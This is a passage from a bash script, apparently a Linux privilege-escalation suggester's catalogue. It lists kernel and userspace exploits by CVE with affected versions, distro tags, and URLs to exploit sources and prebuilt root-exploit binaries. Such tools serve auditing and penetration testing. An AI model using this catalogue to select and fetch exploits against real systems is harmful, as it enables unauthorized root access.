Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.33
Tags: RHEL=5
Rank: 1
exploit-db: 15024
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0056]${txtrst} memodipper
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=3.1.0
Tags: ubuntu=(10.04|11.10){kernel:3.0.0-12-(generic|server)}
Rank: 1
analysis-url: https://git.zx2c4.com/CVE-2012-0056/about/
src-url: https://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/memodipper64
exploit-db: 18411
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0056,CVE-2010-3849,CVE-2010-3850]${txtrst} full-nelson
Reqs: pkg=linux-kernel,ver>=2.6.0,ver<=2.6.36
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Rank: 1
src-url: http://vulnfactory.org/exploits/full-nelson.c
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/full-nelson64
exploit-db: 15704
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1858]${txtrst} CLONE_NEWUSER|CLONE_FS
Reqs: pkg=linux-kernel,ver=3.8,CONFIG_USER_NS=y
Tags: 
Rank: 1
src-url: http://stealth.openwall.net/xSports/clown-newuser.c
analysis-url: https://lwn.net/Articles/543273/
exploit-db: 38390
author: Sebastian Krahmer
Comments: CONFIG_USER_NS needs to be enabled 
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: RHEL=6,ubuntu=12.04{kernel:3.2.0-(23|29)-generic},fedora=16{kernel:3.1.0-7.fc16.x86_64},fedora=17{kernel:3.3.4-5.fc17.x86_64},debian=7{kernel:3.2.0-4-amd64}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/perf_swevent64
exploit-db: 26131
author: Andrea 'sorbo' Bittau
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} perf_swevent 2
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9,x86_64
Tags: ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic}
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
src-url: https://cyseclabs.com/exploits/vnik_v1.c
exploit-db: 33589
author: Vitaly 'vnik' Nikolenko
Comments: No SMEP/SMAP bypass
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-0268]${txtrst} msr
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<3.7.6
Tags: 
Rank: 1
exploit-db: 27297
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-1959]${txtrst} userns_root_sploit
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.8.9
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2013/04/29/1
exploit-db: 25450
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2013-2094]${txtrst} semtex
Reqs: pkg=linux-kernel,ver>=2.6.32,ver<3.8.9
Tags: RHEL=6
Rank: 1
analysis-url: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
exploit-db: 25444
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=13.10
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/timeoutpwn64
exploit-db: 31346
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0038]${txtrst} timeoutpwn 2
Reqs: pkg=linux-kernel,ver>=3.4.0,ver<=3.13.1,CONFIG_X86_X32=y
Tags: ubuntu=(13.04|13.10){kernel:3.(8|11).0-(12|15|19)-generic}
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
exploit-db: 31347
Comments: CONFIG_X86_X32 needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0196]${txtrst} rawmodePTY
Reqs: pkg=linux-kernel,ver>=2.6.31,ver<=3.14.3
Tags:
Rank: 1
analysis-url: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
exploit-db: 33516
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-2851]${txtrst} use-after-free in ping_init_sock() ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.14
Tags: 
Rank: 0
analysis-url: https://cyseclabs.com/page?n=02012016
exploit-db: 32926
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4014]${txtrst} inode_capable
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.13
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/06/10/4
exploit-db: 33824
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4699]${txtrst} ptrace/sysret
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.8
Tags: ubuntu=12.04
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2014/07/08/16
exploit-db: 34134
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-4943]${txtrst} PPPoL2TP ${bldblu}(DoS)${txtrst}
Reqs: pkg=linux-kernel,ver>=3.2,ver<=3.15.6
Tags: 
Rank: 1
analysis-url: https://cyseclabs.com/page?n=01102015
exploit-db: 36267
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5207]${txtrst} fuse_suid
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<=3.16.1
Tags: 
Rank: 1
exploit-db: 34923
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-9322]${txtrst} BadIRET
Reqs: pkg=linux-kernel,ver>=3.0.1,ver<3.17.5,x86_64
Tags: RHEL<=7,fedora=20
Rank: 1
analysis-url: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
src-url: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
exploit-db:
author: Rafal 'n3rgal' Wojtczuk & Adam 'pi3' Zabrocki
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3290]${txtrst} espfix64_NMI
Reqs: pkg=linux-kernel,ver>=3.13,ver<4.1.6,x86_64
Tags: 
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2015/08/04/8
exploit-db: 37722
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[N/A]${txtrst} bluetooth
Reqs: pkg=linux-kernel,ver<=2.6.11
Tags:
Rank: 1
exploit-db: 4756
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1328]${txtrst} overlayfs
Reqs: pkg=linux-kernel,ver>=3.13.0,ver<=3.19.0
Tags: ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic},ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/717
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_32
bin-url: https://web.archive.org/web/20160602192631/https://www.kernel-exploits.com/media/ofs_64
exploit-db: 37292
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
Tags:
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39230
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8660]${txtrst} overlayfs (ovl_setattr)
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.3.3
Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
Rank: 1
analysis-url: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
exploit-db: 39166
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-0728]${txtrst} keyring
Reqs: pkg=linux-kernel,ver>=3.10,ver<4.4.1
Tags:
Rank: 0
analysis-url: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
exploit-db: 40003
Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-2384]${txtrst} usb-midi
Reqs: pkg=linux-kernel,ver>=3.0.0,ver<=4.4.8
Tags: ubuntu=14.04,fedora=22
Rank: 1
analysis-url: https://xairy.github.io/blog/2016/cve-2016-2384
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
exploit-db: 41999
Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4997]${txtrst} target_offset
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<=4.4.0,cmd:grep -qi ip_tables /proc/modules
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40053.zip
Comments: ip_tables.ko needs to be loaded
exploit-db: 40049
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4557]${txtrst} double-fdput()
Reqs: pkg=linux-kernel,ver>=4.4,ver<4.5.5,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=808
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
exploit-db: 40759
author: Jann Horn
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40611
author: Phil Oester
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow 2
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40839
author: FireFart (author of exploit at EDB 40839); Gabriele Bonacini (author of exploit at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-8655]${txtrst} chocobo_root
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2016/12/06/1
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2016-8655/chocobo_root
exploit-db: 40871
author: rebel
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9793]${txtrst} SO_{SND|RCV}BUFFORCE
Reqs: pkg=linux-kernel,ver>=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags:
Rank: 1
analysis-url: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
exploit-db: 41995
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-6074]${txtrst} dccp
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my]
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/02/22/3
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
exploit-db: 41458
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-7308]${txtrst} af_packet
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Rank: 1
analysis-url: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-7308/exploit
exploit-db: 41994
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Rank: 5
analysis-url: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-16995/exploit.out
exploit-db: 45010
author: Rick Larabee
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000112]${txtrst} NETIF_F_UFO
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/08/13/1
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-1000112/exploit.out
exploit-db:
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000253]${txtrst} PIE_stack_corruption
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Rank: 1
analysis-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
src-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
exploit-db: 42887
author: Qualys
Comments:
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-5333]${txtrst} rds_atomic_free_op NULL pointer dereference
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64
Tags: ubuntu=16.04{kernel:4.4.0|4.8.0}
Rank: 1
src-url: https://gist.githubusercontent.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4/raw/959325819c78248a6437102bb289bb8578a135cd/cve-2018-5333-poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2018-5333/cve-2018-5333.c
Comments: rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR.
author: wbowling (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-18955]${txtrst} subuid_shell
Reqs: pkg=linux-kernel,ver>=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ]
Tags: ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
exploit-db: 45886
author: Jann Horn
Comments: CONFIG_USER_NS needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-13272]${txtrst} PTRACE_TRACEME
Reqs: pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
exploit-db: 47133
exploit-db: 47163
author: Jann Horn (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-15666]${txtrst} XFRM_UAF
Reqs: pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y
Tags:
Rank: 1
analysis-url: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
bin-url: https://github.com/duasynt/xfrm_poc/raw/master/lucky0
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-27365]${txtrst} linux-iscsi
Reqs: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y
Tags: RHEL=8
Rank: 1
analysis-url: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
src-url: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
author: GRIMM
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3490]${txtrst} eBPF ALU32 bounds tracking for bitwise ops
Reqs: pkg=linux-kernel,ver>=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Rank: 5
analysis-url: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
src-url: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
author: chompie1337
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-22555]${txtrst} Netfilter heap out-of-bounds write
Reqs: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6
Tags: ubuntu=20.04{kernel:5.8.0-*}
Rank: 1
analysis-url: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
src-url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
exploit-db: 50135
author: theflow (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
Tags: ubuntu=(20.04|21.04),debian=11
Rank: 1
analysis-url: https://dirtypipe.cm4all.com/
src-url: https://haxx.in/files/dirtypipez.c
exploit-db: 50808
author: blasty (original exploit author: Max Kellermann)
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-2586]${txtrst} nft_object UAF
Reqs: pkg=linux-kernel,ver>=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(20.04){kernel:5.12.13}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2022/08/29/5
src-url: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: Team Orca of Sea Security; Exploit author: Alejandro Guerrero
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-32250]${txtrst} nft_object UAF (NFT_MSG_NEWSET)
Reqs: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Rank: 1
analysis-url: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
analysis-url: https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
src-url: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit: theori.io
EOF
)


############ USERSPACE EXPLOITS ###########################
n=0

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0186]${txtrst} samba
Reqs: pkg=samba,ver<=2.2.8
Tags: 
Rank: 1
exploit-db: 23674
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev
Reqs: pkg=udev,ver<141,cmd:[[ -f /etc/udev/rules.d/95-udev-late.rules || -f /lib/udev/rules.d/95-udev-late.rules ]]
Tags: ubuntu=8.10|9.04
Rank: 1
exploit-db: 8572
Comments: Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed 
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev 2
Reqs: pkg=udev,ver<141
Tags:
Rank: 1
exploit-db: 8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-0832]${txtrst} PAM MOTD
Reqs: pkg=libpam-modules,ver<=1.1.1
Tags: ubuntu=9.10|10.04
Rank: 1
exploit-db: 14339
Comments: SSH access to non privileged user is needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4170]${txtrst} SystemTap
Reqs: pkg=systemtap,ver<=1.3
Tags: RHEL=5{systemtap:1.1-3.el5},fedora=13{systemtap:1.2-1.fc13}
Rank: 1
author: Tavis Ormandy
exploit-db: 15620
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-1485]${txtrst} pkexec
Reqs: pkg=polkit,ver=0.96
Tags: RHEL=6,ubuntu=10.04|10.10
Rank: 1
exploit-db: 17942
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-2921]${txtrst} ktsuss
Reqs: pkg=ktsuss,ver<=1.4
Tags: sparky=5|6
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2011/08/13/2
src-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2011-2921/ktsuss-lpe.sh
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0809]${txtrst} death_star (sudo)
Reqs: pkg=sudo,ver>=1.8.0,ver<=1.8.3
Tags: fedora=16 
Rank: 1
analysis-url: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
exploit-db: 18436
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0476]${txtrst} chkrootkit
Reqs: pkg=chkrootkit,ver<0.50
Tags: 
Rank: 1
analysis-url: http://seclists.org/oss-sec/2014/q2/430
exploit-db: 33899
Comments: Rooting depends on the crontab (up to one day of delay)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5119]${txtrst} __gconv_translit_find
Reqs: pkg=glibc|libc6,x86
Tags: debian=6
Rank: 1
analysis-url: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
exploit-db: 34421
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1862]${txtrst} newpid (abrt)
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: fedora=20
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3315]${txtrst} raceabrt
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
